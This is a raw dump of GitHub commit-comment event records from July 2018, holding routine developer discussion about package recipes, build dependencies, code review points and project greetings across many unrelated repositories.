{"id":"8009753792","type":"CommitCommentEvent","actor":{"login":"Chandrashekarachar"},"repo":{"name":"Chandrashekarachar/hello-world-1"},"payload":{"comment":{"id":29813318,"position":null,"line":null,"path":null,"commit_id":"2db6c9de42c7388dd950dded31cab3e99e97793e","created_at":"2018-07-24T12:13:32Z","updated_at":"2018-07-24T12:13:32Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-24T12:13:32Z"}
{"id":"8009758089","type":"CommitCommentEvent","actor":{"login":"nouredinovic"},"repo":{"name":"alignan/IPv6-WSN-book"},"payload":{"comment":{"id":29813331,"position":null,"line":null,"path":null,"commit_id":"2de741e412ac11a9b39327385f37957b201c5124","created_at":"2018-07-24T12:14:24Z","updated_at":"2018-07-24T12:14:24Z","author_association":"NONE","body":"it's interesting booklet !"}},"created_at":"2018-07-24T12:14:24Z"}
{"id":"8009760879","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29813335,"position":null,"line":null,"path":null,"commit_id":"9cc40afed9466c7a0ec13a2694f22d34399118c8","created_at":"2018-07-24T12:14:59Z","updated_at":"2018-07-24T12:14:59Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-30](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-30).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-30-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-24T12:14:59Z"}
{"id":"8009760897","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/vsc-base-feedstock"},"payload":{"comment":{"id":29813336,"position":null,"line":null,"path":null,"commit_id":"5cdd6e4fc8d58863a148e068005f2cbccce733e9","created_at":"2018-07-24T12:14:59Z","updated_at":"2018-07-24T12:14:59Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @boegel was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-24T12:14:59Z"}
{"id":"8009762849","type":"CommitCommentEvent","actor":{"login":"kingflurkel"},"repo":{"name":"swarmcity/SwarmCitySite"},"payload":{"comment":{"id":29813343,"position":null,"line":null,"path":null,"commit_id":"b129d0f734346fa9cd4b47df0d0977f77b20139b","created_at":"2018-07-24T12:15:22Z","updated_at":"2018-07-24T12:15:22Z","author_association":"CONTRIBUTOR","body":"Congrats my friend <3"}},"created_at":"2018-07-24T12:15:22Z"}
{"id":"8009769737","type":"CommitCommentEvent","actor":{"login":"iandobbie"},"repo":{"name":"MicronOxford/cockpit"},"payload":{"comment":{"id":29813355,"position":null,"line":null,"path":null,"commit_id":"961a3cc643016700b444cc9749b7666060e6bf53","created_at":"2018-07-24T12:16:47Z","updated_at":"2018-07-24T12:16:47Z","author_association":"MEMBER","body":"Ah. Thanks David. Good work. I hope this will make life here a lot easier.\r\n\r\nIan\r\n\r\nSent from my iPhone\r\n\r\nOn 24 Jul 2018, at 10:19, Carnë Draug <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\nOn Tue, 24 Jul 2018, 08:00 Ian Dobbie, <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n> Can someone try this on deepsim this week to see if it fixes the\r\n> excitation wavelength issue?\r\n>\r\n\r\nI already did that. I only pushed this commit after having tried it on\r\ndeepsim and then reconstruction on softworx.\r\n\r\n>\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/MicronOxford/cockpit/commit/961a3cc643016700b444cc9749b7666060e6bf53#commitcomment-29811365>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AFMwhd7sS6zd8va1St9kvJthHpecEhvdks5uJuaIgaJpZM4VcMDL>.\r\n"}},"created_at":"2018-07-24T12:16:47Z"}
{"id":"8009769992","type":"CommitCommentEvent","actor":{"login":"pb-dseifert"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29813356,"position":5,"line":5,"path":"recipes/blasr/build.sh","commit_id":"171140de62927e917a7010caba257c11bc053b81","created_at":"2018-07-24T12:16:51Z","updated_at":"2018-07-24T12:16:51Z","author_association":"CONTRIBUTOR","body":"why did you add these flags? they are not used by Meson"}},"created_at":"2018-07-24T12:16:51Z"}
{"id":"8009775763","type":"CommitCommentEvent","actor":{"login":"MarkoPaasila"},"repo":{"name":"Codaone/DEXBot"},"payload":{"comment":{"id":29813368,"position":55,"line":58,"path":"dexbot/strategies/staggered_orders.py","commit_id":"258f8a7488fb0e69ce0fe6b79357708c4acf5fed","created_at":"2018-07-24T12:17:59Z","updated_at":"2018-07-24T12:17:59Z","author_association":"COLLABORATOR","body":"Don't forget \"Allow immediate fill\" with 'true' as default."}},"created_at":"2018-07-24T12:17:59Z"}
{"id":"8009776199","type":"CommitCommentEvent","actor":{"login":"pb-dseifert"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29813370,"position":36,"line":26,"path":"recipes/blasr/meta.yaml","commit_id":"171140de62927e917a7010caba257c11bc053b81","created_at":"2018-07-24T12:18:05Z","updated_at":"2018-07-24T12:18:05Z","author_association":"CONTRIBUTOR","body":"@bgruening @johanneskoester you removed the pbbam lib pinning. This will cause ABI failures when pbbam gets updated."}},"created_at":"2018-07-24T12:18:05Z"}
{"id":"8009779262","type":"CommitCommentEvent","actor":{"login":"joshuous"},"repo":{"name":"EAS-Project/AnyKernel2"},"payload":{"comment":{"id":29813376,"position":null,"line":null,"path":null,"commit_id":"6394ca4b3ca52ba92f381d23d342313871cc09e6","created_at":"2018-07-24T12:18:42Z","updated_at":"2018-07-24T12:18:42Z","author_association":"MEMBER","body":"@shoaib0597, you should always test and measure it for yourself. Our SOCs differ and so may your ROM"}},"created_at":"2018-07-24T12:18:42Z"}
{"id":"8009781108","type":"CommitCommentEvent","actor":{"login":"pb-dseifert"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29813378,"position":47,"line":34,"path":"recipes/blasr/meta.yaml","commit_id":"171140de62927e917a7010caba257c11bc053b81","created_at":"2018-07-24T12:19:05Z","updated_at":"2018-07-24T12:19:05Z","author_association":"CONTRIBUTOR","body":"pbbam is not part of runtime dependencies anymore."}},"created_at":"2018-07-24T12:19:05Z"}
{"id":"8009783085","type":"CommitCommentEvent","actor":{"login":"karanjkarnikhil4"},"repo":{"name":"karanjkarnikhil4/website"},"payload":{"comment":{"id":29813383,"position":1,"line":1,"path":"lipsum.txt","commit_id":"d4fccaf670e8d4971a89e8333d83d9c6f8905fdf","created_at":"2018-07-24T12:19:28Z","updated_at":"2018-07-24T12:19:28Z","author_association":"OWNER","body":"### hey\r\n**do we really need  **"}},"created_at":"2018-07-24T12:19:28Z"}
{"id":"8009787399","type":"CommitCommentEvent","actor":{"login":"dnhamburaa"},"repo":{"name":"dnhamburaa/DARLINGTON"},"payload":{"comment":{"id":29813388,"position":null,"line":null,"path":null,"commit_id":"7bdceebdbe443b74b5555a83abcec47ee38f5539","created_at":"2018-07-24T12:20:21Z","updated_at":"2018-07-24T12:20:21Z","author_association":"OWNER","body":"IT OWESOME"}},"created_at":"2018-07-24T12:20:21Z"}
{"id":"8009792183","type":"CommitCommentEvent","actor":{"login":"fangfufu"},"repo":{"name":"fangfufu/httpdirfs"},"payload":{"comment":{"id":29813391,"position":4,"line":14,"path":"main.c","commit_id":"bfceba8e1bd58ee134b6deb63a1fa24cc63b62cc","created_at":"2018-07-24T12:21:18Z","updated_at":"2018-07-24T12:21:18Z","author_association":"OWNER","body":"Why?"}},"created_at":"2018-07-24T12:21:18Z"}
{"id":"8009795015","type":"CommitCommentEvent","actor":{"login":"fangfufu"},"repo":{"name":"fangfufu/httpdirfs"},"payload":{"comment":{"id":29813396,"position":480,"line":625,"path":"network.c","commit_id":"bfceba8e1bd58ee134b6deb63a1fa24cc63b62cc","created_at":"2018-07-24T12:21:53Z","updated_at":"2018-07-24T12:21:53Z","author_association":"OWNER","body":"But I fixed it elsewhere. "}},"created_at":"2018-07-24T12:21:53Z"}
{"id":"8009795202","type":"CommitCommentEvent","actor":{"login":"mvcweb75"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29813397,"position":null,"line":null,"path":null,"commit_id":"282f60159dfbc17b6fc856d832dc39f00d72aae9","created_at":"2018-07-24T12:21:56Z","updated_at":"2018-07-24T12:21:56Z","author_association":"OWNER","body":"네, 구조는 좋습니다. "}},"created_at":"2018-07-24T12:21:56Z"}
{"id":"8009834958","type":"CommitCommentEvent","actor":{"login":"MarkoPaasila"},"repo":{"name":"Codaone/DEXBot"},"payload":{"comment":{"id":29813465,"position":47,"line":51,"path":"dexbot/strategies/staggered_orders.py","commit_id":"258f8a7488fb0e69ce0fe6b79357708c4acf5fed","created_at":"2018-07-24T12:29:36Z","updated_at":"2018-07-24T12:29:36Z","author_association":"COLLABORATOR","body":"Don't forget \"Allow immediate fill\" with 'true' as default."}},"created_at":"2018-07-24T12:29:36Z"}
{"id":"8009835863","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29813466,"position":null,"line":null,"path":null,"commit_id":"a0b14add502b74479e11abb6d94f3e9282770203","created_at":"2018-07-24T12:29:46Z","updated_at":"2018-07-24T12:29:46Z","author_association":"NONE","body":"Without the additional `!improving` condition this would be a simplification. Else at best a [0,4] because complexity keeps the same. But i would prefer a [0,5] because you remove code from a not-hot path  code segment (init) and add code in a hot path segment (search, for every move)"}},"created_at":"2018-07-24T12:29:46Z"}
{"id":"8009839531","type":"CommitCommentEvent","actor":{"login":"tmvumbi2"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29813472,"position":null,"line":null,"path":null,"commit_id":"478b03f3569bdc8058d9c6916d875ca1cc63a7fc","created_at":"2018-07-24T12:30:26Z","updated_at":"2018-07-24T12:30:26Z","author_association":"NONE","body":"Nice work @kaweesi; here is a couple of comments from my chat with Dr Joseph:\r\n- the field otherNationality needs to be a simple text field allowing the user to capture a custom nationality (that is not in the drop-down)\r\n- the field otherNationality should be hidden until the value 'other' is selected on the drop-down. If the user captures something on otherNationality, then selects a country from the drop down, otherNationality should be cleared and hidden"}},"created_at":"2018-07-24T12:30:26Z"}
{"id":"8009840707","type":"CommitCommentEvent","actor":{"login":"rzr"},"repo":{"name":"fiskeben/bmp085"},"payload":{"comment":{"id":29813475,"position":null,"line":null,"path":null,"commit_id":"a964efa2a993d04e2a1b19e82288de094bde68a8","created_at":"2018-07-24T12:30:39Z","updated_at":"2018-07-24T12:30:39Z","author_association":"CONTRIBUTOR","body":"well I want to port this to iotjs so ES6 is not my priority eventually I'll stay on 1.x branch,\r\nThe question is how do you deal with npm repos ? will you fork it ?\r\nI can eventually rebase on https://www.npmjs.com/package/bmp085-sensor\r\nRegards\r\n"}},"created_at":"2018-07-24T12:30:39Z"}
{"id":"8009841293","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29813477,"position":47,"line":34,"path":"recipes/blasr/meta.yaml","commit_id":"171140de62927e917a7010caba257c11bc053b81","created_at":"2018-07-24T12:30:44Z","updated_at":"2018-07-24T12:30:44Z","author_association":"CONTRIBUTOR","body":"@pb-dseifert please add it here so we pin this stuff globally: https://github.com/bioconda/bioconda-utils/blob/master/bioconda_utils/bioconda_utils-conda_build_config.yaml"}},"created_at":"2018-07-24T12:30:44Z"}
{"id":"8009841771","type":"CommitCommentEvent","actor":{"login":"chris-rands"},"repo":{"name":"chris-rands/profiles_from_protein_families"},"payload":{"comment":{"id":29813478,"position":104,"line":142,"path":"rules/mmseqs.smk","commit_id":"37a0ed3786dbc9a86081218eeca81c5881b4cd58","created_at":"2018-07-24T12:30:49Z","updated_at":"2018-07-24T12:30:49Z","author_association":"OWNER","body":"Thanks for this! This sub-sampling is *with* replacement (i.e. the same sequence can be sampled multiple times), is that what you wanted?"}},"created_at":"2018-07-24T12:30:49Z"}
{"id":"8009842859","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29813481,"position":36,"line":26,"path":"recipes/blasr/meta.yaml","commit_id":"171140de62927e917a7010caba257c11bc053b81","created_at":"2018-07-24T12:31:01Z","updated_at":"2018-07-24T12:31:01Z","author_association":"CONTRIBUTOR","body":"\r\n\r\n@pb-dseifert please add it here so we pin this stuff globally: https://github.com/bioconda/bioconda-utils/blob/master/bioconda_utils/bioconda_utils-conda_build_config.yaml\r\n"}},"created_at":"2018-07-24T12:31:01Z"}
{"id":"8009846013","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29813487,"position":47,"line":34,"path":"recipes/blasr/meta.yaml","commit_id":"171140de62927e917a7010caba257c11bc053b81","created_at":"2018-07-24T12:31:34Z","updated_at":"2018-07-24T12:31:34Z","author_association":"CONTRIBUTOR","body":"If its not why do you need to pin it then? If its just a build-time dependency."}},"created_at":"2018-07-24T12:31:34Z"}
{"id":"8009846082","type":"CommitCommentEvent","actor":{"login":"MarkoPaasila"},"repo":{"name":"Codaone/DEXBot"},"payload":{"comment":{"id":29813488,"position":null,"line":null,"path":null,"commit_id":"258f8a7488fb0e69ce0fe6b79357708c4acf5fed","created_at":"2018-07-24T12:31:35Z","updated_at":"2018-07-24T12:31:35Z","author_association":"COLLABORATOR","body":"Starting to look good "}},"created_at":"2018-07-24T12:31:35Z"}
{"id":"8009848543","type":"CommitCommentEvent","actor":{"login":"SilasK"},"repo":{"name":"chris-rands/profiles_from_protein_families"},"payload":{"comment":{"id":29813492,"position":104,"line":142,"path":"rules/mmseqs.smk","commit_id":"37a0ed3786dbc9a86081218eeca81c5881b4cd58","created_at":"2018-07-24T12:32:03Z","updated_at":"2018-07-24T12:32:03Z","author_association":"COLLABORATOR","body":"Yes it is, I’m not shure if it’s the best way to do.\n"}},"created_at":"2018-07-24T12:32:03Z"}
{"id":"8009851878","type":"CommitCommentEvent","actor":{"login":"karthicksk24"},"repo":{"name":"karthicksk24/TestPro"},"payload":{"comment":{"id":29813499,"position":6,"line":5,"path":"ASC842journalexport.aspx","commit_id":"e83cdfe13705bd305392cbe3e03436af0d0db1e4","created_at":"2018-07-24T12:32:39Z","updated_at":"2018-07-24T12:32:39Z","author_association":"OWNER","body":"changed by karthi for unwanted space"}},"created_at":"2018-07-24T12:32:39Z"}
{"id":"8009852836","type":"CommitCommentEvent","actor":{"login":"IvoPaunov"},"repo":{"name":"AdExNetwork/adex-dapp"},"payload":{"comment":{"id":29813500,"position":10,"line":50,"path":"src/components/common/autocomplete/common.js","commit_id":"dca3df5bc229132dfa12a1f0f3d500b03d653461","created_at":"2018-07-24T12:32:48Z","updated_at":"2018-07-24T12:32:48Z","author_association":"CONTRIBUTOR","body":"Use adex-transalations"}},"created_at":"2018-07-24T12:32:48Z"}
{"id":"8009853428","type":"CommitCommentEvent","actor":{"login":"haomingsy"},"repo":{"name":"xuanjuechanyuan/XUANToken"},"payload":{"comment":{"id":29813501,"position":null,"line":null,"path":null,"commit_id":"1f83986df4c337f807b73408f919ae2b702599bb","created_at":"2018-07-24T12:32:55Z","updated_at":"2018-07-24T12:32:55Z","author_association":"NONE","body":"![101532434058_ pic](https://user-images.githubusercontent.com/40593001/43138137-81c87c76-8f80-11e8-97ef-67f4f6492ff9.jpg)\r\n"}},"created_at":"2018-07-24T12:32:55Z"}
{"id":"8009857250","type":"CommitCommentEvent","actor":{"login":"pb-dseifert"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29813509,"position":47,"line":34,"path":"recipes/blasr/meta.yaml","commit_id":"171140de62927e917a7010caba257c11bc053b81","created_at":"2018-07-24T12:33:36Z","updated_at":"2018-07-24T12:33:36Z","author_association":"CONTRIBUTOR","body":"pbbam is most *definitely* not a buildtime dependency only, see the original recipe. On the other hand, boost was added as a runtime dependency, even though it only uses headers from boost and doesn't link. This CB3 transformation has been less than optimal..."}},"created_at":"2018-07-24T12:33:36Z"}
{"id":"8009857277","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29813510,"position":null,"line":null,"path":null,"commit_id":"478b03f3569bdc8058d9c6916d875ca1cc63a7fc","created_at":"2018-07-24T12:33:36Z","updated_at":"2018-07-24T12:33:36Z","author_association":"COLLABORATOR","body":"thanks Tresor, those issues will be address as part of the concept\ndictionary story and so log them to it\n\nOn Tue, Jul 24, 2018 at 3:30 PM tmvumbi2 <notifications@github.com> wrote:\n\n> Nice work @kaweesi <https://github.com/kaweesi>; here is a couple of\n> comments from my chat with Dr Joseph:\n>\n>    - the field otherNationality needs to be a simple text field allowing\n>    the user to capture a custom nationality (that is not in the drop-down)\n>    - the field otherNationality should be hidden until the value 'other'\n>    is selected on the drop-down. If the user captures something on\n>    otherNationality, then selects a country from the drop down,\n>    otherNationality should be cleared and hidden\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jembi/openmrs-module-msfcore/commit/478b03f3569bdc8058d9c6916d875ca1cc63a7fc#commitcomment-29813472>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APJk8mVkOUk-HYrgb9Me2zcFbVHRYSelks5uJxNigaJpZM4Vcpgz>\n> .\n>\n\n\n-- \n\n*Kaweesi Joseph*\n\n*Jembi Health Systems NPC* *|  **Uganda*\n\n*Mobile: **+256784994313** | Office: **Software Developer** | Skype:*\n*kaweesi.joseph*\n*E-mail: kaweesi@jembi.org <kaweesi@jembi.org>*\n\n\n\n*This e-mail contains proprietary and confidential information some or all\nof which may be legally privileged. It is for the intended recipient only.\nIf an addressing or transmission error has misdirected this e-mail, please\nnotify the author by replying to this e-mail and then deleting same. If you\nare not the intended recipient you must not use, disclose, distribute,\ncopy, print or rely on this e-mail. Jembi Health Systems NPO, its\nsubsidiaries and associated companies is not liable for the security of\ninformation sent by e-mail and accepts no liability of whatsoever nature\nfor any loss, damage or expense resulting, directly or indirectly, from the\naccess of this e-mail or any attachments hereto.*\n"}},"created_at":"2018-07-24T12:33:36Z"}
{"id":"8009858193","type":"CommitCommentEvent","actor":{"login":"haomingsy"},"repo":{"name":"xuanjuechanyuan/XUANToken"},"payload":{"comment":{"id":29813511,"position":null,"line":null,"path":null,"commit_id":"1f83986df4c337f807b73408f919ae2b702599bb","created_at":"2018-07-24T12:33:46Z","updated_at":"2018-07-24T12:33:46Z","author_association":"NONE","body":"![91532434058_ pic](https://user-images.githubusercontent.com/40593001/43138262-d15e067a-8f80-11e8-8b09-a4b93f362002.jpg)\r\n"}},"created_at":"2018-07-24T12:33:46Z"}
{"id":"8009866407","type":"CommitCommentEvent","actor":{"login":"Jildor"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29813525,"position":null,"line":null,"path":null,"commit_id":"fac470014b4b97060a22c346aadfaf9c03b99ff2","created_at":"2018-07-24T12:35:22Z","updated_at":"2018-07-24T12:35:22Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-24T12:35:22Z"}
{"id":"8009867362","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29813526,"position":47,"line":34,"path":"recipes/blasr/meta.yaml","commit_id":"171140de62927e917a7010caba257c11bc053b81","created_at":"2018-07-24T12:35:34Z","updated_at":"2018-07-24T12:35:34Z","author_association":"CONTRIBUTOR","body":"@pb-dseifert you are welcome to help! :)"}},"created_at":"2018-07-24T12:35:34Z"}
{"id":"8009875205","type":"CommitCommentEvent","actor":{"login":"llemeurfr"},"repo":{"name":"readium/readium-2"},"payload":{"comment":{"id":29813537,"position":96,"line":76,"path":"locators/README.md","commit_id":"c186c44766fa3134e0dfbc226d3a715d7c284368","created_at":"2018-07-24T12:37:04Z","updated_at":"2018-07-24T12:37:04Z","author_association":"CONTRIBUTOR","body":"It works well for the current resource (rendered). For searches, we may return other types of locations (depending what the search engine can give). If we also want a progression indicator on search results, the algo may be less precise but \"sufficient\" (e.g. based on character offsets). This can evolve yes, but this is how it's done today, therefore now documented.   "}},"created_at":"2018-07-24T12:37:04Z"}
{"id":"8009879082","type":"CommitCommentEvent","actor":{"login":"Dog2puppy"},"repo":{"name":"Sleitnick/AeroGameFramework"},"payload":{"comment":{"id":29813542,"position":null,"line":null,"path":null,"commit_id":"4a6b9b73f21738f086210e96fd2077731213a2cd","created_at":"2018-07-24T12:37:49Z","updated_at":"2018-07-24T12:37:49Z","author_association":"NONE","body":"Idk where to put this, but I'll just put it here since its the most recent commit on the DataService. \r\n\r\nDo I have to worry about pcalls and error handling in my own code that interfaces with the DataService? "}},"created_at":"2018-07-24T12:37:49Z"}
{"id":"8009885407","type":"CommitCommentEvent","actor":{"login":"dcs619"},"repo":{"name":"SparkDevNetwork/Rock"},"payload":{"comment":{"id":29813552,"position":null,"line":null,"path":null,"commit_id":"31b39ebaeaaf14cd6d8ff0e9d36904fa2440c9c1","created_at":"2018-07-24T12:39:05Z","updated_at":"2018-07-24T12:39:05Z","author_association":"COLLABORATOR","body":"@edmistj Is there a different fix for é characters or is this no longer necessary?"}},"created_at":"2018-07-24T12:39:05Z"}
{"id":"8009886805","type":"CommitCommentEvent","actor":{"login":"SouailleB"},"repo":{"name":"SouailleB/Particles-in-ABCflow"},"payload":{"comment":{"id":29813555,"position":44,"line":44,"path":"ABCflow.cpp","commit_id":"cf28074c28732242bf7ed199d36b0e74ce7f56e0","created_at":"2018-07-24T12:39:20Z","updated_at":"2018-07-24T12:39:20Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-24T12:39:20Z"}
{"id":"8009887649","type":"CommitCommentEvent","actor":{"login":"eternal-flame-AD"},"repo":{"name":"pea3nut/pxer-homepage"},"payload":{"comment":{"id":29813557,"position":5,"line":11,"path":"routes/md.js","commit_id":"df5586207511cd6d34f471b851ef1f9e1fc83e6e","created_at":"2018-07-24T12:39:30Z","updated_at":"2018-07-24T12:39:30Z","author_association":"CONTRIBUTOR","body":"\\w metacharacter equals to [A-Za-z0-9_]\r\nunderscore is alrealy included"}},"created_at":"2018-07-24T12:39:30Z"}
{"id":"8009899641","type":"CommitCommentEvent","actor":{"login":"kirrg001"},"repo":{"name":"TryGhost/Ghost"},"payload":{"comment":{"id":29813584,"position":null,"line":null,"path":null,"commit_id":"76b9a49eb8f253485dea06d26b4ca4e07f9b6f35","created_at":"2018-07-24T12:41:39Z","updated_at":"2018-07-24T12:41:39Z","author_association":"CONTRIBUTOR","body":"This commit indirectly references to https://github.com/TryGhost/Ghost/issues/9742."}},"created_at":"2018-07-24T12:41:39Z"}
{"id":"8009900546","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29813587,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-24T12:41:50Z","updated_at":"2018-07-24T12:41:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T12:41:50Z"}
{"id":"8009901110","type":"CommitCommentEvent","actor":{"login":"OrdinaryMagician"},"repo":{"name":"OrdinaryMagician/gzdoom"},"payload":{"comment":{"id":29813589,"position":null,"line":null,"path":null,"commit_id":"f287e99f968c740819b6d61000865589fbbe387c","created_at":"2018-07-24T12:41:56Z","updated_at":"2018-07-24T12:41:56Z","author_association":"OWNER","body":"In that case, GetWindowBordersSize() would have to be made a public function of the class, since event processing is done outside of it."}},"created_at":"2018-07-24T12:41:56Z"}
{"id":"8009901126","type":"CommitCommentEvent","actor":{"login":"Ne3tCode"},"repo":{"name":"SteamDatabase/Protobufs"},"payload":{"comment":{"id":29813590,"position":null,"line":null,"path":null,"commit_id":"e88847b390b28736e41d03f9614e23371aab50cf","created_at":"2018-07-24T12:41:56Z","updated_at":"2018-07-24T12:41:56Z","author_association":"NONE","body":"Actual"}},"created_at":"2018-07-24T12:41:56Z"}
{"id":"8009907548","type":"CommitCommentEvent","actor":{"login":"khairul169"},"repo":{"name":"fire/gdsqlite-native"},"payload":{"comment":{"id":29813595,"position":68,"line":134,"path":"src/gdsqlite.c","commit_id":"df915b3b5b7143a0108ddae961c98347fcb264ef","created_at":"2018-07-24T12:43:06Z","updated_at":"2018-07-24T12:43:06Z","author_association":"NONE","body":"It should be, i think.."}},"created_at":"2018-07-24T12:43:06Z"}
{"id":"8009909376","type":"CommitCommentEvent","actor":{"login":"lpeterson1"},"repo":{"name":"SparkDevNetwork/Rock"},"payload":{"comment":{"id":29813599,"position":null,"line":null,"path":null,"commit_id":"31b39ebaeaaf14cd6d8ff0e9d36904fa2440c9c1","created_at":"2018-07-24T12:43:25Z","updated_at":"2018-07-24T12:43:25Z","author_association":"NONE","body":"@dcs619 I pinged you on Slack. I can fill you in.\r\n"}},"created_at":"2018-07-24T12:43:25Z"}
{"id":"8009912639","type":"CommitCommentEvent","actor":{"login":"Timer"},"repo":{"name":"facebook/create-react-app"},"payload":{"comment":{"id":29813602,"position":null,"line":null,"path":null,"commit_id":"d0afe4b3b99b1b0b6ea5b72ccc50a6066c15aac0","created_at":"2018-07-24T12:44:01Z","updated_at":"2018-07-24T12:44:01Z","author_association":"COLLABORATOR","body":"Can you open a formal issue @danielberndt?"}},"created_at":"2018-07-24T12:44:01Z"}
{"id":"8009918684","type":"CommitCommentEvent","actor":{"login":"PhilippWendler"},"repo":{"name":"sosy-lab/java-common-lib"},"payload":{"comment":{"id":29813622,"position":null,"line":null,"path":null,"commit_id":"859dc016d24ce92dc98d48ae118662d757cf6bf6","created_at":"2018-07-24T12:45:07Z","updated_at":"2018-07-24T12:45:07Z","author_association":"MEMBER","body":"That's why I included `test`. Most of the JARs in `build` are not dependencies for compilation, only these:\r\nhttps://github.com/sosy-lab/java-common-lib/blob/859dc016d24ce92dc98d48ae118662d757cf6bf6/build.xml#L82\r\n\r\nAdding other JARs to the classpath can easily lead to dependency conflicts (there is already a `guava.jar` in most of these directories), and to introducing unwanted dependencies due to auto-completion of classes that should not be used."}},"created_at":"2018-07-24T12:45:07Z"}
{"id":"8009919672","type":"CommitCommentEvent","actor":{"login":"fiskeben"},"repo":{"name":"fiskeben/bmp085"},"payload":{"comment":{"id":29813628,"position":null,"line":null,"path":null,"commit_id":"a964efa2a993d04e2a1b19e82288de094bde68a8","created_at":"2018-07-24T12:45:16Z","updated_at":"2018-07-24T12:45:16Z","author_association":"OWNER","body":"I guess as long as you have something like `~1.0.0` in your `dependencies` you should be fine. I actually haven't verified publishing from two different branches (or from a branch different from `master`) but I haven't been able to find any proof that it won't work, either. If it turns out not to work I think I'll spin it off into a new project."}},"created_at":"2018-07-24T12:45:16Z"}
{"id":"8009926558","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29813646,"position":363,"line":474,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T12:46:34Z","updated_at":"2018-07-24T12:46:34Z","author_association":"NONE","body":"I think you are right here - because I've used unsigned integers in lport_lcstats.  In the event when the draining of tx ring is done by core that has sent no packets before (or at least less then it is to be dropped) it could wrap the counter around and then later it would be casted to int64 when transferring as a large number.  I'm going to switch to signed integers.\r\nAs for the second sentence: that would require me to always parse packets in the TX ring to know what port they are coming from.  I don't want to do that - I only want to do that in the unlikely case of failure.  So instead tx_burst is going to assume optimistically that when queueing to TX buffer later transmission is going to succeed.  And here I'm going to correct this.  It is true that in that case for some short period of time \"per core\" stats can be wrong (one core too much for given port and the other core too little), but when accumulated in per port stats they will be good."}},"created_at":"2018-07-24T12:46:34Z"}
